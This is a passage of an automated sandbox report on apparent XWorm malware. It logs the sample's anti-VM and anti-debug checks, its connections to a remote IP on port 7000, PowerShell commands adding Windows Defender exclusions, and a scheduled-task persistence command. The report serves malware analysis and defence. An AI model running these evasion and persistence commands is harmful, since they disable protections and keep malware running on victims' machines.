                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3800Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 4444Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 312Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                Source: svchost.exe.0.drBinary or memory string: vmware
                Source: file.exe, 00000000.00000002.1669798088.0000000000D39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
                Source: svchost.exe, 00000003.00000002.2922481757.000000001BE00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllicK
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FFB4AD37A81 CheckRemoteDebuggerPresent,3_2_00007FFB4AD37A81
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 208.95.112.1 80Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.141.26.134 7000Jump to behavior
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                Bypasses PowerShell execution policy
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe" Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"Jump to behavior
                Source: svchost.exe, 00000003.00000002.2914398163.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E84000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                Source: svchost.exe, 00000003.00000002.2914398163.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E84000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: svchost.exe, 00000003.00000002.2914398163.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E84000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                Source: svchost.exe, 00000003.00000002.2914398163.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E84000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                Source: svchost.exe, 00000003.00000002.2914398163.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2914398163.0000000002E84000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeQueries volume information: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeQueries volume information: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
